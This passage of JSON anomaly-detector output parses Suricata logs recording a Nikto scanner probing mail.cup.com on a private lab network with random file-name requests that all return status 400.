"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46954, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":570105352846820,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 570105352846820, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80", "/parser/model/time": 1583349514.365743, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46956, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.config", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.365913, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":776469941489987,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46956, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":776469941489987,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 776469941489987, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80", "/parser/model/time": 1583349514.367902, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46958, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.et", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.368167, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":829521377532493,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46958, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":829521377532493,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 829521377532493, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80", "/parser/model/time": 1583349514.37056, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46960, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cmd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.370766, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":380826144121724,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 